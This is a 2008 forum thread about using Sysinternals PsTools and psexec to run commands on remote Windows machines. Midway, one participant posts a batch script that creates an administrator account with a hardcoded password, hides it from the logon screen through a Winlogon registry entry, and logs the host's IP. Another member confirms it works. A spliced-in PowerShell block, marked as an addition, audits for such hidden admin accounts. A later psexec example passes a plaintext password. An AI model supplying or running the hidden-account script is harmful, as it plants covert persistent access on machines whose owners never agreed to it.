ZeroBeat Posted December 8, 2008
Well, this may sound like a noob question, but I'm currently running Linux, so I am not able to try this out myself. I have looked a little at the Sysinternals tool "PsTools" for remotely running commands on different computers. I can easily see how I am supposed to use it, but does anyone know what it requires on the other side? I guess you would need some kind of access to the remote user, to prevent you from just running whatever on an entire network, or is it simply just the script kiddie's wet dream? Anybody had any experience with it?

Timmo Posted December 8, 2008
I haven't looked at PsTools, but for running commands remotely you need to be authenticated to the remote machine as administrator or have the same privs. Personally I use the AutoIt scripting language (found at www.autoit.com) to create a GUI interface to run remote commands using WMI. Hope this helps.

ZeroBeat Posted December 8, 2008
Thanks, thought so too, but looking through TechNet's web page I could not find any information about that.

X3N Posted December 8, 2008
psexec: you need admin privileges to run over the network... pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies

VaKo Posted December 8, 2008
TechNet: PStools
PsTools Primer

ZeroBeat Posted December 8, 2008
> psexec: you need admin privileges to run over the network... pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies

I know it is for network administration, and have looked through it. I just got concerned, when it did not appear anywhere on the TechNet web page, that it was meant as a tool for corporate networks.

aeturnus Posted December 9, 2008
> Well, this may sound like a noob question, but I'm currently running Linux, so I am not able to try this out myself. I have looked a little at the Sysinternals tool "PsTools" for remotely running commands on different computers. I can easily see how I am supposed to use it, but does anyone know what it requires on the other side? I guess you would need some kind of access to the remote user, to prevent you from just running whatever on an entire network, or is it simply just the script kiddie's wet dream? Anybody had any experience with it?

I think this has been mentioned, but you're looking for "psexec". To run it you require Administrator privileges on the remote computer and access to the remote computer's ADMIN$ share.

ZeroBeat Posted December 9, 2008
> I think this has been mentioned, but you're looking for "psexec". To run it you require Administrator privileges on the remote computer and access to the remote computer's ADMIN$ share.

So something like this might do the trick? (Batch file in case someone would not know ;))

    @echo off
    set DEST=.
    set USER=RemoteSys
    set PASS=mypassword
    cls
    # Creates the registry tweaks for hiding the user
    ECHO REGEDIT4 > "regpatch.reg"
    ECHO. >> "regpatch.reg"
    ECHO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList >> "regpatch.reg"
    ECHO "%USER%"="dword:00000001">> "regpatch.reg"
    ECHO. >> "regpatch.reg"
    # Creates the user and tries to add it to the admin group
    echo Setting up remote acces for user: %USERNAME% > "%DEST%\log-%USERNAME%.txt"
    net user %USER% %PASS% /add >> "%DEST%\log-%USERNAME%.txt"
    net localgroup Adminstratorer %USER% /ADD >> "%DEST%\log-%USERNAME%.txt"
    net localgroup Adminstrators %USER% /ADD >> "%DEST%\log-%USERNAME%.txt"
    regedit /S regpatch.reg >> "%DEST%\log-%USERNAME%.txt"
    # Cleaning up
    del regpatch.reg
    # Saves the information to the disired location
    ipconfig >> "%DEST%\ip-%USERNAME%.txt"

Or am I totally off?

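A defender-side audit for the account setup discussed in the post above, as an added example that is not part of the original thread: it lists local accounts that appear under `Winlogon\SpecialAccounts\UserList` and marks which of them are members of the built-in Administrators group. It assumes Windows PowerShell 5.1 or later (LocalAccounts module) and an elevated prompt; a DWORD value of 0 under that key hides an account from the logon screen.

```powershell
# Added example: audit local accounts listed under SpecialAccounts\UserList.
# Assumes Windows PowerShell 5.1+ (Microsoft.PowerShell.LocalAccounts), run elevated.

$userListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

# Collect every value name under the key together with its data.
$listed = @{}
if (Test-Path -LiteralPath $userListKey) {
    $key = Get-Item -LiteralPath $userListKey
    foreach ($name in $key.GetValueNames()) {
        $listed[$name] = $key.GetValue($name)
    }
}

# Resolve the built-in Administrators group by its well-known SID, so the
# check also works on localized systems where the group name differs.
$adminSids = @(Get-LocalGroupMember -SID 'S-1-5-32-544' |
    ForEach-Object { $_.SID.Value })

$localUsers = @(Get-LocalUser)

$report = foreach ($user in $localUsers) {
    $inList = $listed.ContainsKey($user.Name)
    [pscustomobject]@{
        Name          = $user.Name
        Enabled       = $user.Enabled
        IsLocalAdmin  = $adminSids -contains $user.SID.Value
        UserListValue = if ($inList) { $listed[$user.Name] } else { $null }
        HiddenAtLogon = $inList -and ($listed[$user.Name] -eq 0)
    }
}

# Review list: every local admin, plus every account named in UserList.
$report |
    Where-Object { $_.IsLocalAdmin -or $null -ne $_.UserListValue } |
    Sort-Object -Property HiddenAtLogon, IsLocalAdmin -Descending |
    Format-Table -AutoSize

# UserList entries with no matching local account (stale or pre-staged names).
$orphans = $listed.Keys | Where-Object { $localUsers.Name -notcontains $_ }
if ($orphans) {
    Write-Warning ("UserList entries without a local account: " + ($orphans -join ', '))
}
```
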
aeturnus Posted December 9, 2008
I think that'll work to get you an account on that machine as an Admin. What's curious to me, though, since my scripting is a bit rusty: Why do you need that cls on the 5th line if @echo off has already executed?

ZeroBeat Posted December 9, 2008
> I think that'll work to get you an account on that machine as an Admin. What's curious to me, though, since my scripting is a bit rusty: Why do you need that cls on the 5th line if @echo off has already executed?

Well, echo off only prevents the input from being shown; output is still shown.

aeturnus Posted December 9, 2008
Ah, makes sense. Thanks :)

c0der3d Posted December 16, 2008
PSTools is designed to manage a large group of Windows machines. I use this on a daily basis. It allows you to execute remote commands on Windows PCs that you have access to. For example, I have some vbscripts that run automation for me. I can remotely tell my automation system to begin the test by executing PS tools:

    cmd > psexec \\automation -u administrator -p password "c:\startAutomation.bat"

You can also use them to reboot, gather information about the system, etc.